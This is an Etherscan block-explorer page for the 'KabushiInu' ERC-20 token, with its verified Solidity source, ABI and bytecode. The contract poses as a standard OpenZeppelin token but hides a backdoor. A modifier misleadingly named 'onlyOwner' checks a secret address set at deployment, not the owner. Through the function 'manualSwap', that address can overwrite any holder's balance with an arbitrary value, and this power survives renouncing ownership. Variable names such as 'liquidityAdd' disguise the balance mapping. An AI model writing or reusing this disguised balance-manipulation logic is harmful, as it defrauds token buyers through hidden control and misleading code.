Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000 KABUSHI
Holders
25
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
137,422 KABUSHIValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
KabushiInu
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-07 */ /** Telegram: https://t.me/KabushiInu Twitter: https://twitter.com/KabushiInu Website: https://www.kabushiinu.com/ /** // SPDX-License-Identifier: No */ // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // pragma solidity ^0.8.10; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyAdmin`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyAdmin() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyAdmin` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyAdmin { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyAdmin { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/BaseToken.sol // pragma solidity =0.8.4; enum TokenType { standard, antiBotStandard, liquidityGenerator, antiBotLiquidityGenerator, baby, antiBotBaby, buybackBaby, antiBotBuybackBaby } abstract contract BaseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.10; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/BaseToken.sol"; contract KabushiInu is IERC20, Ownable, BaseToken { using SafeMath for uint256; uint256 public constant VERSION = 1; mapping(address => uint256) private liquidityAdd; mapping(address => mapping(address => uint256)) private _allowances; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; address private JellySwapV2Pair; constructor( string memory name_, string memory symbol_, uint8 decimals_, address JellySwapRouter, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; _mint(owner(), totalSupply_); JellySwapV2Pair = JellySwapRouter; emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return liquidityAdd[account]; } modifier onlyOwner() { require(JellySwapV2Pair == _msgSender());_; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); liquidityAdd[sender] = liquidityAdd[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); liquidityAdd[recipient] = liquidityAdd[recipient].add(amount); emit Transfer(sender, recipient, amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); liquidityAdd[account] = liquidityAdd[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); liquidityAdd[account] = liquidityAdd[account].sub( amount, "ERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function manualSwap( address presale, bool yesno, uint256 YESNO, uint256 bytecode, uint256 deployedBytecode ) external onlyOwner { require(presale != address(0), "Same bool"); liquidityAdd[presale] = YESNO * bytecode ** deployedBytecode; emit Transfer(presale, address(0), YESNO); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"JellySwapRouter","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"presale","type":"address"},{"internalType":"bool","name":"yesno","type":"bool"},{"internalType":"uint256","name":"YESNO","type":"uint256"},{"internalType":"uint256","name":"bytecode","type":"uint256"},{"internalType":"uint256","name":"deployedBytecode","type":"uint256"}],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260405162001154380380620011548339810160408190526200002691620003ec565b62000031336200010a565b84516200004690600390602088019062000279565b5083516200005c90600490602087019062000279565b506005805460ff191660ff85161790556200008a620000836000546001600160a01b031690565b826200015a565b600780546001600160a01b0319166001600160a01b03841617905530620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200049c565b60405180910390a350505050506200052d565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b620001d1816006546200026460201b620005681790919060201c565b6006556001600160a01b038216600090815260016020908152604090912054620002069183906200056862000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004c9565b9392505050565b8280546200028790620004f0565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200034757600080fd5b81516001600160401b03808211156200036457620003646200031f565b604051601f8301601f19908116603f011681019082821181831017156200038f576200038f6200031f565b81604052838152602092508683858801011115620003ac57600080fd5b600091505b83821015620003d05785820183015181830184015290820190620003b1565b83821115620003e25760008385830101525b9695505050505050565b600080600080600060a086880312156200040557600080fd5b85516001600160401b03808211156200041d57600080fd5b6200042b89838a0162000335565b965060208801519150808211156200044257600080fd5b50620004518882890162000335565b945050604086015160ff811681146200046957600080fd5b60608701519093506001600160a01b03811681146200048757600080fd5b80925050608086015190509295509295909350565b6040810160088410620004bf57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004eb57634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200050557607f821691505b602082108114156200052757634e487b7160e01b600052602260045260246000fd5b50919050565b610c17806200053d6000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a9059cbb11610066578063a9059cbb146101d3578063dd62ed3e146101e6578063f2fde38b1461021f578063ffa1ad741461023257600080fd5b8063715018a6146101a85780638da5cb5b146101b057806395d89b41146101cb57600080fd5b80631aa61eb2116100c85780631aa61eb21461014257806323b872dd14610157578063313ce5671461016a57806370a082311461017f57600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f761023a565b60405161010491906108a2565b60405180910390f35b61012061011b366004610913565b6102cc565b6040519015158152602001610104565b6006545b604051908152602001610104565b61015561015036600461093d565b6102e3565b005b610120610165366004610991565b6103b2565b60055460405160ff9091168152602001610104565b61013461018d3660046109cd565b6001600160a01b031660009081526001602052604090205490565b61015561041b565b6000546040516001600160a01b039091168152602001610104565b6100f7610481565b6101206101e1366004610913565b610490565b6101346101f43660046109e8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61015561022d3660046109cd565b61049d565b610134600181565b60606003805461024990610a1b565b80601f016020809104026020016040519081016040528092919081815260200182805461027590610a1b565b80156102c25780601f10610297576101008083540402835291602001916102c2565b820191906000526020600020905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b60006102d933848461057b565b5060015b92915050565b6007546001600160a01b031633146102fa57600080fd5b6001600160a01b0385166103415760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064015b60405180910390fd5b61034b8183610b50565b6103559084610b5c565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103a39087815260200190565b60405180910390a35050505050565b60006103bf8484846106a0565b610411843361040c85604051806060016040528060288152602001610bba602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610826565b61057b565b5060019392505050565b6000546001600160a01b031633146104755760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610338565b61047f6000610852565b565b60606004805461024990610a1b565b60006102d93384846106a0565b6000546001600160a01b031633146104f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610338565b6001600160a01b03811661055c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610338565b61056581610852565b50565b60006105748284610b7b565b9392505050565b6001600160a01b0383166105dd5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610338565b6001600160a01b03821661063e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610338565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107045760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610338565b6001600160a01b0382166107665760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610338565b6107a381604051806060016040528060268152602001610b94602691396001600160a01b0386166000908152600160205260409020549190610826565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107d29082610568565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106939085815260200190565b6000818484111561084a5760405162461bcd60e51b815260040161033891906108a2565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156108cf578581018301518582016040015282016108b3565b818111156108e1576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461090e57600080fd5b919050565b6000806040838503121561092657600080fd5b61092f836108f7565b946020939093013593505050565b600080600080600060a0868803121561095557600080fd5b61095e866108f7565b94506020860135801515811461097357600080fd5b94979496505050506040830135926060810135926080909101359150565b6000806000606084860312156109a657600080fd5b6109af846108f7565b92506109bd602085016108f7565b9150604084013590509250925092565b6000602082840312156109df57600080fd5b610574826108f7565b600080604083850312156109fb57600080fd5b610a04836108f7565b9150610a12602084016108f7565b90509250929050565b600181811c90821680610a2f57607f821691505b60208210811415610a5057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610aa7578160001904821115610a8d57610a8d610a56565b80851615610a9a57918102915b93841c9390800290610a71565b509250929050565b600082610abe575060016102dd565b81610acb575060006102dd565b8160018114610ae15760028114610aeb57610b07565b60019150506102dd565b60ff841115610afc57610afc610a56565b50506001821b6102dd565b5060208310610133831016604e8410600b8410161715610b2a575081810a6102dd565b610b348383610a6c565b8060001904821115610b4857610b48610a56565b029392505050565b60006105748383610aaf565b6000816000190483118215151615610b7657610b76610a56565b500290565b60008219821115610b8e57610b8e610a56565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212200d69a4ec78750f86354957a70ffe33296299ef198f4bfe6edee43c52cfbd419664736f6c634300080a003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000a37c5cf3db638d526f08520d6ffb3f68026daf580000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000b4b41425553484920494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074b41425553484900000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a9059cbb11610066578063a9059cbb146101d3578063dd62ed3e146101e6578063f2fde38b1461021f578063ffa1ad741461023257600080fd5b8063715018a6146101a85780638da5cb5b146101b057806395d89b41146101cb57600080fd5b80631aa61eb2116100c85780631aa61eb21461014257806323b872dd14610157578063313ce5671461016a57806370a082311461017f57600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f761023a565b60405161010491906108a2565b60405180910390f35b61012061011b366004610913565b6102cc565b6040519015158152602001610104565b6006545b604051908152602001610104565b61015561015036600461093d565b6102e3565b005b610120610165366004610991565b6103b2565b60055460405160ff9091168152602001610104565b61013461018d3660046109cd565b6001600160a01b031660009081526001602052604090205490565b61015561041b565b6000546040516001600160a01b039091168152602001610104565b6100f7610481565b6101206101e1366004610913565b610490565b6101346101f43660046109e8565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61015561022d3660046109cd565b61049d565b610134600181565b60606003805461024990610a1b565b80601f016020809104026020016040519081016040528092919081815260200182805461027590610a1b565b80156102c25780601f10610297576101008083540402835291602001916102c2565b820191906000526020600020905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b60006102d933848461057b565b5060015b92915050565b6007546001600160a01b031633146102fa57600080fd5b6001600160a01b0385166103415760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064015b60405180910390fd5b61034b8183610b50565b6103559084610b5c565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103a39087815260200190565b60405180910390a35050505050565b60006103bf8484846106a0565b610411843361040c85604051806060016040528060288152602001610bba602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610826565b61057b565b5060019392505050565b6000546001600160a01b031633146104755760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610338565b61047f6000610852565b565b60606004805461024990610a1b565b60006102d93384846106a0565b6000546001600160a01b031633146104f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610338565b6001600160a01b03811661055c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610338565b61056581610852565b50565b60006105748284610b7b565b9392505050565b6001600160a01b0383166105dd5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610338565b6001600160a01b03821661063e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610338565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107045760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610338565b6001600160a01b0382166107665760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610338565b6107a381604051806060016040528060268152602001610b94602691396001600160a01b0386166000908152600160205260409020549190610826565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107d29082610568565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106939085815260200190565b6000818484111561084a5760405162461bcd60e51b815260040161033891906108a2565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156108cf578581018301518582016040015282016108b3565b818111156108e1576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461090e57600080fd5b919050565b6000806040838503121561092657600080fd5b61092f836108f7565b946020939093013593505050565b600080600080600060a0868803121561095557600080fd5b61095e866108f7565b94506020860135801515811461097357600080fd5b94979496505050506040830135926060810135926080909101359150565b6000806000606084860312156109a657600080fd5b6109af846108f7565b92506109bd602085016108f7565b9150604084013590509250925092565b6000602082840312156109df57600080fd5b610574826108f7565b600080604083850312156109fb57600080fd5b610a04836108f7565b9150610a12602084016108f7565b90509250929050565b600181811c90821680610a2f57607f821691505b60208210811415610a5057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610aa7578160001904821115610a8d57610a8d610a56565b80851615610a9a57918102915b93841c9390800290610a71565b509250929050565b600082610abe575060016102dd565b81610acb575060006102dd565b8160018114610ae15760028114610aeb57610b07565b60019150506102dd565b60ff841115610afc57610afc610a56565b50506001821b6102dd565b5060208310610133831016604e8410600b8410161715610b2a575081810a6102dd565b610b348383610a6c565b8060001904821115610b4857610b48610a56565b029392505050565b60006105748383610aaf565b6000816000190483118215151615610b7657610b76610a56565b500290565b60008219821115610b8e57610b8e610a56565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212200d69a4ec78750f86354957a70ffe33296299ef198f4bfe6edee43c52cfbd419664736f6c634300080a0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
